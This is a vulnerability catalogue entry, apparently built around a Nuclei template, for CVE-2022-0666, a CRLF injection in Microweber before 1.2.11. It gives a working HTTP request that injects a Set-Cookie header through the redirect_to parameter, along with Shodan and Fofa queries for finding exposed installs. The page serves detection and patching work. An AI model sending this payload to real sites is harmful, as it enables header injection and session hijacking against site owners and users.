🔙 목록으로 돌아가기

CVE-2022-0666: Microweber < 1.2.11 - CRLF Injection

TitleMicroweber < 1.2.11 - CRLF Injection
Authorritikchaddha
SeverityHigh
ImpactAttackers can inject CRLF sequences via the redirect_to parameter to set arbitrary cookies or inject additional HTTP headers, potentially facilitating session hijacking or cache poisoning attacks.
RemediationUpgrade to Microweber version 1.2.11 or later.
CVSS Score7.5
EPSS Score0.28901
CVE IDCVE-2022-0666
CWE IDCWE-93
Shodan Queryhttp.favicon.hash:780351152http.html:"microweber"
Fofa Queryicon_hash=780351152body="microweber"
Tags cve huntr crlf microweber cve2022 vuln

🔍 Vulnerability Description

CRLF Injection leads to Stack Trace Exposure due to lack of filtering at https://demo.microweber.org/ in Packagist microweber/microweber prior to 1.2.11.

🌐 HTTP Request

GET /api/logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1; HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0666.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-0666.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A